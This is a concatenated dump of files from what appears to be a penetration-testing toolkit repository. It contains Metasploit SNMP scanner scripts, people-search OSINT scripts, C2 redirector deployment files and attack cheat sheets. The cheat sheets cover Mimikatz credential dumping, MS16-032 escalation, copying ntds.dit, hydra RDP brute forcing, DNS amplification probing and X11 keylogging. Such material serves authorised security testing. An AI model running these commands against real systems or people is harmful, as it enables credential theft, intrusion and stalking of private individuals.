29 | -------------------------------------------------------------------------------- /resource/161-udp-snmp.rc: -------------------------------------------------------------------------------- 1 | setg RHOSTS file: 2 | setg THREADS 255 3 | setg RPORT 161 4 | 5 | use auxiliary/scanner/misc/oki_scanner 6 | run 7 | 8 | use auxiliary/scanner/snmp/aix_version 9 | run 10 | 11 | use auxiliary/scanner/snmp/arris_dg950 12 | run 13 | 14 | use auxiliary/scanner/snmp/brocade_enumhash 15 | run 16 | 17 | use auxiliary/scanner/snmp/cisco_config_tftp 18 | run 19 | 20 | use auxiliary/scanner/snmp/cisco_upload_file 21 | echo 'Hello world!' 
> /tmp/test.txt 22 | set SOURCE /tmp/test.txt 23 | run 24 | 25 | use auxiliary/scanner/snmp/cnpilot_r_snmp_loot 26 | run 27 | 28 | use auxiliary/scanner/snmp/epmp1000_snmp_loot 29 | run 30 | 31 | use auxiliary/scanner/snmp/netopia_enum 32 | run 33 | 34 | use auxiliary/scanner/snmp/sbg6580_enum 35 | run 36 | 37 | use auxiliary/scanner/snmp/snmp_enum 38 | run 39 | 40 | use auxiliary/scanner/snmp/snmp_enumshares 41 | run 42 | 43 | use auxiliary/scanner/snmp/snmp_enumusers 44 | run 45 | 46 | use auxiliary/scanner/snmp/snmp_login 47 | run 48 | 49 | use auxiliary/scanner/snmp/ubee_ddw3611 50 | run 51 | 52 | use auxiliary/scanner/snmp/xerox_workcentre_enumusers 53 | run 54 | -------------------------------------------------------------------------------- /notes/Python/scrape.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import sys 4 | import webbrowser 5 | from time import sleep 6 | 7 | 8 | def main(): 9 | company = 'Google' 10 | domain = 'google.com' 11 | 12 | # Add only URL's that take the domain URL 13 | urls_domain = [ 14 | 'https://api.hackertarget.com/dnslookup/?q=', 15 | 'https://api.hackertarget.com/reversedns/?q=', 16 | 'https://api.hackertarget.com/pagelinks/?q=', 17 | 'https://seositecheckup.com/seo-audit/', 18 | 'http://viewdns.info/reversewhois/?q=', 19 | 'http://viewdns.info/dnsreport/?domain=', 20 | 'http://www.spyonweb.com/' 21 | ] 22 | 23 | # Add only URL's that take the company name 24 | urls_company = [ 25 | 'https://censys.io/ipv4?q=', 26 | 'https://www.shodan.io/search?query=' 27 | ] 28 | 29 | for url in urls_domain: 30 | webbrowser.open_new_tab(url + domain) 31 | sleep(2) 32 | 33 | for comp in urls_company: 34 | webbrowser.open_new_tab(comp + company) 35 | sleep(2) 36 | 37 | 38 | if __name__ == '__main__': 39 | main() 40 | sys.exit(0) 41 | -------------------------------------------------------------------------------- /person.sh: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | f_runlocally 4 | clear 5 | f_banner 6 | 7 | echo -e "${BLUE}RECON${NC}" 8 | echo 9 | echo -n "First name: " 10 | read firstName 11 | 12 | # Check for no answer 13 | if [ -z $firstName ]; then 14 | f_error 15 | fi 16 | 17 | echo -n "Last name: " 18 | read lastName 19 | 20 | # Check for no answer 21 | if [ -z $lastName ]; then 22 | f_error 23 | fi 24 | 25 | xdg-open https://www.411.com/name/$firstName-$lastName/ & 26 | sleep 2 27 | uripath="https://www.advancedbackgroundchecks.com/search/results.aspx?type=&fn=${firstName}&mi=&ln=${lastName}&age=&city=&state=" 28 | xdg-open $uripath & 29 | sleep 2 30 | xdg-open https://www.linkedin.com/pub/dir/?first=$firstName\&last=$lastName\&search=Search & 31 | sleep 2 32 | xdg-open https://www.peekyou.com/$firstName%5f$lastName & 33 | sleep 2 34 | xdg-open https://www.addresses.com/people/$firstName+$lastName & 35 | sleep 2 36 | xdg-open https://www.spokeo.com/$firstName-$lastName & 37 | sleep 2 38 | xdg-open https://twitter.com/search?q=%22$firstName%20$lastName%22&src=typd & 39 | sleep 2 40 | xdg-open https://www.youtube.com/results?search_query=$firstName+$lastName & 41 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2007-2017 Lee Baird 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission 
notice shall be included in 13 | all copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN 21 | THE SOFTWARE. 22 | -------------------------------------------------------------------------------- /misc/deploy/ansible/redirector-c2.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - hosts: all 4 | become: yes 5 | tasks: 6 | - name: apt update 7 | apt: 8 | update_cache: yes 9 | cache_valid_time: 3600 10 | force_apt_get: yes 11 | 12 | - name: apt -y upgrade ; apt -y dist-upgrade ; apt -y autoremove ; apt -y autoclean 13 | apt: 14 | update_cache: yes 15 | # upgrade: dist 16 | cache_valid_time: 3600 17 | force_apt_get: yes 18 | autoremove: yes 19 | autoclean: yes 20 | 21 | - name: Install packages 22 | apt: 23 | name: 24 | - apache2 25 | - curl 26 | - git 27 | - locate 28 | - net-tools 29 | - socat 30 | - wget 31 | state: latest 32 | 33 | - name: Install Apache modules 34 | shell: | 35 | a2enmod headers proxy proxy_html proxy_http rewrite ssl 36 | 37 | - name: Start Apache 38 | service: 39 | name: apache2 40 | state: started 41 | 42 | - name: Change Apache config to allow for mod-rewrite 43 | ansible.builtin.replace: 44 | path: /etc/apache2/apache2.conf 45 | after: '' 46 | before: '' 47 | regexp: ^\tAllowOverride None$ 48 | replace: '\tAllowOverride All' 49 | 50 | - name: Restart the Apache service 51 | service: 52 | name: apache2 53 | state: restarted 54 | -------------------------------------------------------------------------------- 
/parsers/utfdictcsv.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # by John Kim 4 | # Thanks to Securicon, LLC. for sponsoring development 5 | # 6 | # -*- coding:utf-8 -*- 7 | # 8 | # Last edited by Alexander Sferrella on 9/22/2017 9 | # Ported to python3 by Jay Townsend 2021-10-11 10 | 11 | import codecs 12 | from io import StringIO 13 | import csv 14 | 15 | 16 | ################################################################ 17 | 18 | 19 | class DictUnicodeWriter(object): 20 | 21 | def __init__(self, f, fieldnames, dialect=csv.excel, encoding="utf-8", **kwds): 22 | # Redirect output to a queue 23 | self.queue = StringIO() 24 | self.writer = csv.DictWriter(self.queue, fieldnames, dialect=dialect, **kwds) 25 | self.stream = f 26 | self.encoder = codecs.getincrementalencoder(encoding)() 27 | 28 | def writerow(self, D): 29 | self.writer.writerow({k: v for k, v in D.items() if v}) 30 | 31 | # Fetch UTF-8 output from the queue ... 32 | data = self.queue.getvalue() 33 | data = str.encode(data).decode("utf-8") 34 | # ... 
and re-encode it into the target encoding 35 | data = self.encoder.encode(data) 36 | # Write to the target stream 37 | self.stream.write(data) 38 | # Empty queue 39 | self.queue.truncate(0) 40 | 41 | def writerows(self, rows): 42 | for D in rows: 43 | self.writerow(D) 44 | 45 | def writeheader(self): 46 | self.writer.writeheader() 47 | -------------------------------------------------------------------------------- /notes/Python/discover/recon/person.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import os 4 | 5 | # variables 6 | colorBlue = "\033[01;34m{0}\033[00m" 7 | 8 | ############################################################################################################## 9 | 10 | runlocally() 11 | os.system("clear") 12 | banner() 13 | 14 | print colorBlue.format("RECON") 15 | print 16 | firstName = raw_input("First name: ") 17 | 18 | if firstName == "": 19 | error() 20 | 21 | lastName = raw_input("Last name: ") 22 | 23 | if lastName == "": 24 | error() 25 | 26 | webbrowser.open("http://www.411.com/name/"+firstName+"-"+lastName+"/") 27 | time.sleep(2) 28 | uripath="http://www.advancedbackgroundchecks.com/search/results.aspx?type=&fn=${"+firstName+"}&mi=&ln=${"+lastName+"}&age=&city=&state=" 29 | webbrowser.open(uripath) 30 | time.sleep(2) 31 | webbrowser.open("https://www.linkedin.com/pub/dir/"+firstName+"/"+lastName) 32 | time.sleep(2) 33 | webbrowser.open("http://www.peekyou.com/"+firstName+"%5f"+lastName) 34 | time.sleep(2) 35 | webbrowser.open("http://phonenumbers.addresses.com/people/"+firstName+"+"+lastName) 36 | time.sleep(2) 37 | webbrowser.open("https://pipl.com/search/?q="+firstName+"+"+lastName) 38 | time.sleep(2) 39 | webbrowser.open("http://www.spokeo.com/"+firstName+"-"+lastName) 40 | time.sleep(2) 41 | webbrowser.open("https://twitter.com/search?q=%22"+firstName+"%20"+lastName+"%22") 42 | time.sleep(2) 43 | 
webbrowser.open("https://www.youtube.com/results?search_query="+firstName+"+"+lastName) 44 | 45 | print 46 | print 47 | sys.exit(0) 48 | -------------------------------------------------------------------------------- /mods/virustotal_subdomain_enum.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "Bharath" 4 | __description__ = """A script to extract sub-domains that Virus Total 5 | has found for a given domain name. Modified by Jay Townsend aka L1ghtn1ng""" 6 | 7 | import argparse 8 | import sys 9 | 10 | try: 11 | from requests import get, exceptions 12 | except ImportError: 13 | raise ImportError('requests library missing. pip3 install requests.') 14 | 15 | 16 | parser = argparse.ArgumentParser(description='Scrapes https://crt.sh for subdomains from SSL certificate transparency.') 17 | parser.add_argument('-d', '--domain', required=True, help='Domain to lookup.') 18 | parser.add_argument('-l', '--limit', default='40', help='How many to output, max allowed is 40 and the default.') 19 | args = parser.parse_args() 20 | 21 | 22 | def check_virustotal(): 23 | url = "https://www.virustotal.com/ui/domains/{0}/subdomains?limit={1}".format(args.domain, args.limit) 24 | print("URL being queried: {}".format(url)) 25 | try: 26 | get(url) 27 | except exceptions.RequestException as e: 28 | print(e) 29 | sys.exit(1) 30 | response = get(url) 31 | return response.json() 32 | 33 | 34 | def print_results(search_results): 35 | for index, item in enumerate(search_results['data']): 36 | print(item['id']) 37 | 38 | 39 | if __name__ == '__main__': 40 | try: 41 | search_results = check_virustotal() 42 | print_results(search_results) 43 | except KeyboardInterrupt: 44 | print('CTRL + C detected, quiting.') 45 | -------------------------------------------------------------------------------- /mods/goofile.py: -------------------------------------------------------------------------------- 1 | 
#!/usr/bin/python3 2 | 3 | import re 4 | import requests 5 | import sys 6 | 7 | from lxml import html 8 | 9 | domain = sys.argv[1] 10 | filetype = sys.argv[2] 11 | start = 0 12 | results = [] 13 | totalFiles = 0 14 | 15 | 16 | def google_dork(): 17 | global domain 18 | global filetype 19 | global start 20 | global results 21 | global totalFiles 22 | 23 | regex = re.compile(r'(?Phttp\S{3}\w+\S+)(?P&prev=search)', re.MULTILINE.IGNORECASE,) 24 | headers = { 25 | "Host": "www.google.com", 26 | "User-agent": 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 27 | "Referrer": "google.com" 28 | } 29 | 30 | url = f'https://www.google.com/search?hl=en&q=site%3A{domain}%20filetype%3A{filetype}&num=100&start={start}' 31 | page = requests.get(url, headers=headers) 32 | tree = html.fromstring(page.content) 33 | results = tree.xpath('//*[@class="r"]/a/@href') 34 | 35 | totalFiles += len(results) 36 | 37 | for link in results: 38 | match = re.search(regex, link) 39 | if match: 40 | print(match.group('urls')) 41 | else: 42 | print(f'{link}') 43 | 44 | if results != []: 45 | start += 100 46 | 47 | 48 | def main(): 49 | global results 50 | global totalFiles 51 | global filetype 52 | 53 | google_dork() 54 | 55 | if results == []: 56 | sys.exit() 57 | 58 | while results != []: 59 | google_dork() 60 | 61 | 62 | if __name__ == '__main__': 63 | main() 64 | -------------------------------------------------------------------------------- /config/zshrc: -------------------------------------------------------------------------------- 1 | 2 | # ----------------------------------------------------------------------------------------------- 3 | 4 | dns=$(ip r | grep dhcp | awk '{print $3}') 5 | extip=$(curl -s http://ifconfig.me) 6 | ip=$(hostname -I | awk '{print $1}') 7 | mac=$(ip a | grep ether | awk '{print $2}') 8 | 9 | alias c='clear' 10 | alias cl='clear ; ls -lh --color=auto' 11 | alias cla='clear ; ls -lah --color=auto' 12 | alias 
d='cd $HOME/Desktop/ ; clear' 13 | alias date='date +"%a %b %d, %Y - %r %Z"' 14 | alias e='exit' 15 | alias k='cd /home/kali/' 16 | alias kd='cd /home/kali/Desktop/' 17 | alias l='ls -lh' 18 | alias la='ls -lah' 19 | alias m='service postgresql start ; msfdb init ; msfconsole' 20 | alias n='echo; 21 | echo -n "External IP: "$extip ; echo ; 22 | echo -n "Internal IP: "$ip ; echo ; 23 | echo -n "MAC address: "$mac ; echo ; 24 | echo -n "DNS: "$dns ; echo ; 25 | echo ; netstat -antp; echo ; 26 | ping -c3 google.com' 27 | alias r='cd $HOME ; clear' 28 | alias s='cd /opt/discover/ ; clear' 29 | alias sip='sort -n -u -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4' 30 | alias ssh='ssh -o "XAuthLocation=/opt/X11/bin/xauth"' 31 | alias update='/opt/discover/update.sh' 32 | alias w="echo $ip ; python3 -m http.server 80" 33 | alias w2="echo $ip ; python3 -m http.server 8000" 34 | 35 | #----------------------------------------------------------------------------------------------- 36 | 37 | alias bh='neo4j console & ; sleep 6 ; bloodhound' 38 | alias cs='cd /opt/cobaltstrike/ ; ./teamserver $ip password & ; sleep 5 ; ./cobaltstrike' 39 | alias csr='ssh -f -N -L 50050:localhost:50050 ; cd /opt/cobaltstrike ; ./cobaltstrike' 40 | alias pc='/opt/pycharm-community-2022.2.1/bin/pycharm.sh' 41 | -------------------------------------------------------------------------------- /notes/PowerShell/PS-Attack.txt: -------------------------------------------------------------------------------- 1 | PS-Attack 2 | 3 | 4 | PSAttack.exe 5 | Get-Attack 6 | Get-Attack escalation 7 | Invoke-MS16-032 Should give you a system level command prompt 8 | 9 | PSAttack.exe 10 | Get-Attack mimi 11 | Get-Help Invoke-Mimikatz 12 | Invoke-Mimikatz -DumpCreds 13 | Get-Attack users 14 | Get-NetUser 15 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 16 | 17 | Get-GPPPassword Found a user: lee 18 | Get-Attack "active 
directory" 19 | Get-Help Get-NetUser 20 | Get-NetUser -UserName lee Member of a security group called LocalAdmin 21 | Get-Attack groups 22 | Get-Help Get-NetLocalGroup 23 | Get-NetLocalGroup -GroupName "Administrators" List everyone in the local Administrators group 24 | 25 | Restart PS>Attack 26 | Right click on icon > Run as Administrator Enter admin creds 27 | Get-Attack "local admin" 28 | Find-LocalAdminAccess Show other computers where these admin creds have admin access 29 | Get-Attack find 30 | Get-Help Invoke-UserHunter 31 | Get-Help Invoke-UserHunter -Examples 32 | Invoke-UserHunter -CheckAccess 33 | Get-Help Invoke-Mimikatz 34 | Invoke-Mimikatz -ComputerName -DumpCreds 35 | 36 | Restart PS>Attack 37 | Right click on icon > Run as Administrator Enter the domain admin creds 38 | Get-Attack "domain controller" 39 | Get-NetDomainController 40 | Get-Attack copy 41 | Get-Help Invoke-NinjaCopy -Examples 42 | Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit" ComputerName -LocalDestination "C:\ntds.dit" 43 | ls 44 | -------------------------------------------------------------------------------- /notes/exploits.txt: -------------------------------------------------------------------------------- 1 | Exploits 2 | 3 | 4 | searchsploit 5 | searchsploit -t 6 | 7 | searchsploit -t HP iLo 4 8 | searchsploit -p -x 44005 Show info on the exploit 9 | cp /usr/share/exploitdb/multiple/remote/44005.py /tmp/ Copy the exploit to a new location 10 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 11 | 12 | # Identify if C code is written for Windows or Linux. 
13 | 14 | Windows - process.h, string.h, winbase.h, windows.h, winsock2.h 15 | Linux - arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h 16 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 17 | 18 | # Grep out Windows headers, to leave only Linux based exploits. 19 | 20 | cat sploitlist.txt | grep -i 'exploit' | cut -d ' ' -f1 | xargs grep 'sys' | cut -d ':' -f1 | sort -u 21 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 22 | 23 | # Compiling 24 | 25 | gcc -o exploit 1234.c Basic GCC compile 26 | gcc -m32 -o exploit 2345.c Cross compile 32-bit binary on 64-bit Linux 27 | i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe Cross compile a Windows .exe on Linux 28 | i586-mingw32msvc-gcc adduser.c -o adduser.exe Cross compile a Windows .exe on Linux 29 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 30 | 31 | # Visual Studio 32 | 33 | Select Desktop development with C++ 34 | On the right, select C++/CLI support for v143 build tools 35 | -------------------------------------------------------------------------------- /notes/dns.txt: -------------------------------------------------------------------------------- 1 | DNS 2 | 3 | 4 | # General 5 | 6 | dig target.com <type> a, mx, ns, soa, srv, txt, any 7 | dig -x <target IP> Pointer records 8 | dig @nameserverIP target.com axfr Zone transfer 9 | dig @nameserverIP target.com afro Forward zone transfer 10 | 11 | host -t ns target.com Show name servers 12 | host -t mx target.com Show mail servers 13 | host www.target.com 14 | host -l target.com <nameserver> Zone transfer 15 | 
------------------------------------------------------------------------------------------------------------------------------------------------------ 16 | 17 | # Cache snooping 18 | 19 | host -r www.google.com <nameserver IP> 20 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 21 | 22 | # DNS cache poisoning 23 | 24 | for i in `53.txt`; do dig @"$i" +short porttest.dns-oarc.net TXT; done; > CachePoison.txt 25 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 26 | 27 | # Non-recursive DNS queries 28 | 29 | for i in `cat 53.txt`; do dig @"$i" www.google.com A +norecurse; done > NonRecurive.txt 30 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 31 | 32 | # Open DNS resolution against a DNS server. 33 | 34 | Supply a hostname not cached or inside a company owned domain. 35 | nslookup www.nsa.gov <nameserver IP> 36 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 37 | 38 | # Spoofed request amplification DDoS 39 | 40 | for i in `cat 53.txt`; do dig @"$i" . NS; done > AmpDDoS.txt 41 | -------------------------------------------------------------------------------- /notes/maltego.txt: -------------------------------------------------------------------------------- 1 | Maltego 2 | 3 | 4 | # Example 1 5 | 6 | Create a new graph. 7 | Under the Entity Palette on the left, Infrastructure > Domain 8 | Drag the Domain icon to the right. 9 | Edit the domain to your target. 
10 | Right click > Run Transform > Email addresses from Domain > All 11 | 12 | DNS from Domain > All 13 | ctrl + down to select servers > Resolve to IP > All 14 | ctrl + down to select IPs > DNS from IP > All 15 | ctrl + down to select servers > Convert to Domain > All 16 | ctrl + down to select domains > Email addresses from Domain > All 17 | Select all emails > Other transforms > To Person, emailToMyspaceAccount, emailToFlickerAccount 18 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 19 | 20 | # Example 2 21 | 22 | Select IPv4 Address from the palette on the left and drag the icon to the right. 23 | Edit the IP address to your target. 24 | Right click > Run Transform > DNS from IP > All in this set 25 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 26 | 27 | Add a Domain > edit name to your target (www.target.com) 28 | 29 | # Example 3 30 | 31 | Right click > Run Transform > All Transforms > To Domain [Find other TLDs] 32 | Select all TLDs > Run Transform > All Transforms > To Website [Quick lookup] 33 | 34 | Select all websites > Run Transform > All Transforms > To IP Address [DNS] 35 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 36 | 37 | # Example 4 38 | 39 | RC > Run Transform > DNS from Domain > All in this set 40 | Select all > Run Transform > All Transforms > To IP Address [DNS] 41 | Select all IP addresses > Run Transform > All Transforms > To Netblock [Using whois info] 42 | -------------------------------------------------------------------------------- /report/data/summary.htm: -------------------------------------------------------------------------------- 1 | <!DOCTYPE html> 2 | <html lang="en"> 3 | <head> 4 | <meta 
http-equiv="content-type" content="text/html; charset=UTF-8"> 5 | <meta charset="utf-8"> 6 | <title>Reporting Framework 7 | 8 | 9 | 10 | 11 | 12 | 13 |
14 | 
15 | Company
16 | 
17 | Address
18 | City, State Zip
19 | Phone
20 | URL
21 | ===============================================================================================================================
22 | 
23 | # Summary paragraph about the company.
24 | 
25 | https://finance.yahoo.com
26 | https://www.google.com/finance
27 | https://www.reuters.com/finance/stocks/lookup
28 | https://www.sec.gov/edgar/searchedgar/companysearch.html
29 | 
30 | According to Justia Dockets & Filings, COMPANY is currently involved in ### cases.
31 | https://dockets.justia.com/search?parties=%22COMPANY%22
32 | ===============================================================================================================================
33 | 
34 | Social Media     URL                                                       Followers
35 | 
36 | facebook         https://www.facebook.com/                                 xxx
37 | Instagram        https://www.instagram.com/                                xxx
38 | Linkedin         https://www.linkedin.com/company/                         xxx
39 | Pinterest        https://www.pinterest.com/                                xxx
40 | Twitter          https://twitter.com/                                      xxx
41 | YouTube          https://www.youtube.com/                                  xxx
42 | ===============================================================================================================================
43 | 
44 | Google Dork                             Results
45 | 
46 | 
47 | 
48 | -------------------------------------------------------------------------------- /nikto.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | # Check for root 4 | if [ $EUID == 0 ]; then 5 | echo 6 | echo 7 | echo "[!] This option cannot be ran as root." 8 | echo 9 | exit 10 | fi 11 | 12 | clear 13 | f_banner 14 | 15 | echo -e "${BLUE}Run multiple instances of Nikto in parallel.${NC}" 16 | echo 17 | echo "1. List of IPs" 18 | echo "2. List of IP:port" 19 | echo "3. Previous menu" 20 | echo 21 | echo -n "Choice: " 22 | read choice 23 | 24 | case $choice in 25 | 1) 26 | f_location 27 | 28 | echo 29 | echo -n "Port (default 80): " 30 | read port 31 | echo 32 | 33 | # Check if port is a number 34 | echo "$port" | grep -E "^[0-9]+$" 2>/dev/null 35 | isnum=$? 36 | 37 | if [ $isnum -ne 0 ] && [ ${#port} -gt 0 ]; then 38 | f_error 39 | fi 40 | 41 | if [ ${#port} -eq 0 ]; then 42 | port=80 43 | fi 44 | 45 | if [ $port -lt 1 ] || [ $port -gt 65535 ]; then 46 | f_error 47 | fi 48 | 49 | mkdir $home/data/nikto-$port 50 | 51 | while read -r line; do 52 | xdotool key ctrl+shift+t 53 | xdotool type "nikto -h $line -port $port -no404 -maxtime 20m -Format htm --output $home/data/nikto-$port/$line.htm ; exit" 54 | sleep 1 55 | xdotool key Return 56 | done < "$location" 57 | ;; 58 | 59 | 2) 60 | f_location 61 | 62 | mkdir $home/data/nikto 63 | 64 | while IFS=: read -r host port; do 65 | xdotool key ctrl+shift+t 66 | sleep 1 67 | xdotool type "nikto -h $host -port $port -no404 -maxtime 20m -Format htm --output $home/data/nikto/$host-$port.htm ; exit" 68 | sleep 1 69 | xdotool key Return 70 | done < "$location" 71 | ;; 72 | 73 | 3) f_main;; 74 | *) f_error;; 75 | esac 76 | 77 | echo 78 | echo $medium 79 | echo 80 | echo "***Scan complete.***" 81 | echo 82 | echo 83 | echo -e "The new report is located at ${YELLOW}$home/data/nikto-$port/${NC}\n" 84 | 
-------------------------------------------------------------------------------- /misc/deploy/main.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | aws = { 4 | source = "hashicorp/aws" 5 | version = "~> 4.16" 6 | } 7 | } 8 | 9 | required_version = ">= 1.2.0" 10 | } 11 | 12 | provider "aws" { 13 | region = "us-east-1" 14 | } 15 | 16 | # --------------------------------------------------------------------------------------------------------------------- 17 | 18 | resource "aws_instance" "redirector" { 19 | ami = "ami-052efd3df9dad4825" # Ubuntu for my region 20 | instance_type = "t2.micro" 21 | key_name = "deploy" # Created in AWS GUI 22 | vpc_security_group_ids = [aws_security_group.operators.id] 23 | 24 | tags = { 25 | Name = "Redirector" 26 | } 27 | 28 | provisioner "remote-exec" { 29 | connection { 30 | host = aws_instance.redirector.public_ip 31 | type = "ssh" 32 | user = "ubuntu" 33 | agent = true 34 | private_key = file("~/.ssh/deploy.pem") 35 | } 36 | 37 | inline = ["echo; echo '[*] Connected to new server.'; echo"] 38 | } 39 | 40 | provisioner "local-exec" { 41 | command = "ansible-playbook -u ubuntu -i '${aws_instance.redirector.public_ip},' --private-key ~/.ssh/deploy.pem ansible/redirector-c2.yml" 42 | } 43 | } 44 | 45 | # --------------------------------------------------------------------------------------------------------------------- 46 | 47 | resource "aws_security_group" "operators" { 48 | egress { 49 | from_port = 0 50 | to_port = 0 51 | protocol = "-1" 52 | cidr_blocks = ["0.0.0.0/0"] 53 | } 54 | ingress { 55 | from_port = 22 56 | to_port = 22 57 | protocol = "tcp" 58 | cidr_blocks = [""] 59 | } 60 | ingress { 61 | from_port = 80 62 | to_port = 80 63 | protocol = "tcp" 64 | cidr_blocks = ["0.0.0.0/0"] 65 | } 66 | ingress { 67 | from_port = 443 68 | to_port = 443 69 | protocol = "tcp" 70 | cidr_blocks = ["0.0.0.0/0"] 71 | } 72 | ingress { 73 | from_port = 53 74 | 
to_port = 53 75 | protocol = "udp" 76 | cidr_blocks = ["0.0.0.0/0"] 77 | } 78 | tags = { 79 | Name = "Operators" 80 | } 81 | } 82 | -------------------------------------------------------------------------------- /notes/insecure-protocols.txt: -------------------------------------------------------------------------------- 1 | Insecure Protocols 2 | 3 | 4 | # FTP access with admin/null credentials 5 | 6 | ftp admin@ 7 | user 8 | admin 9 | pwd 10 | 11 | telnet 21 12 | user admin 13 | pass 14 | id; 15 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 16 | 17 | # FTP on non-standard port 18 | 19 | ftp 20 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 21 | 22 | # FTP server does not support AUTH command 23 | 24 | telnet 21 25 | AUTH test 26 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 27 | 28 | # Remote Desktop 29 | 30 | hydra -t 4 -V -l administrator -P /usr/share/wordlists/rockyou.txt rdp://targetIP 31 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 32 | 33 | # Rservices 34 | 35 | 513/tcp 36 | apt-get install rsh-client 37 | rlogin -l root 38 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 39 | 40 | # SSH Protocol v1 41 | 42 | nmap -Pn -n -T4 -p22 --script=sshv1 43 | 44 | ssh -1 45 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 46 | 47 | # X11 48 | 49 | nmap -Pn -n -T4 -p6000-6010 --script=x11-access 50 | 51 | xspy 52 | 53 | OS X 54 | - 
Screenshot 55 | xwd -display : -root -out file.xwd 56 | 57 | - View screenshot 58 | xwud -in file.xwd 59 | 60 | - Key logging 61 | xkey :0.0 62 | 63 | xdotool inject 64 | Open another Terminal and type: 65 | 66 | export DISPLAY=:0 67 | 68 | $ xdotool key x t e r m 69 | $ xdotool key KP_Enter 70 | 71 | Might need to inject 1 char at a time: 72 | 73 | xdotool key x 74 | xdotool key t 75 | xdotool key e 76 | xdotool key r 77 | xdotool key m 78 | -------------------------------------------------------------------------------- /notes/cidr.txt: -------------------------------------------------------------------------------- 1 | CIDR Netmask Networks Usable IPs 2 | /1 128.0.0.0 128 A 2,147,483,646 3 | /2 192.0.0.0 64 A 1,073,741,822 4 | /3 224.0.0.0 32 A 536,870,910 5 | /4 240.0.0.0 16 A 268,435,454 6 | /5 248.0.0.0 8 A 134,217,726 7 | /6 252.0.0.0 4 A 67,108,862 8 | /7 254.0.0.0 2 A 33,554,430 9 | /8 255.0.0.0 1 A 16,777,214 10 | /9 255.128.0.0 128 B 8,388,606 11 | /10 255.192.0.0 64 B 4,194,302 12 | /11 255.224.0.0 32 B 2,097,150 13 | /12 255.240.0.0 16 B 1,048,574 14 | /13 255.248.0.0 8 B 524,286 15 | /14 255.252.0.0 4 B 262,142 16 | /15 255.254.0.0 2 B 131,070 17 | /16 255.255.0.0 1 B 65,534 18 | /17 255.255.128.0 128 C 32,766 19 | /18 255.255.192.0 64 C 16,382 20 | /19 255.255.224.0 32 C 8,190 21 | /20 255.255.240.0 16 C 4,094 22 | /21 255.255.248.0 8 C 2,046 23 | /22 255.255.252.0 4 C 1,022 24 | /23 255.255.254.0 2 C 510 25 | /24 255.255.255.0 1 C 254 26 | /25 255.255.255.128 1/2 C 126 27 | /26 255.255.255.192 1/4 C 62 28 | /27 255.255.255.224 1/8 C 30 29 | /28 255.255.255.240 1/16 C 14 30 | /29 255.255.255.248 1/32 C 6 31 | /30 255.255.255.252 1/64 C 2 32 | /31 255.255.255.254 1 /128 C 2 33 | /32 255.255.255.255 1 /256 C 1 34 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 35 | 36 | # Reserved Networks 37 | 38 | Class Start End IPs Comment 39 | A 10.0.0.0 
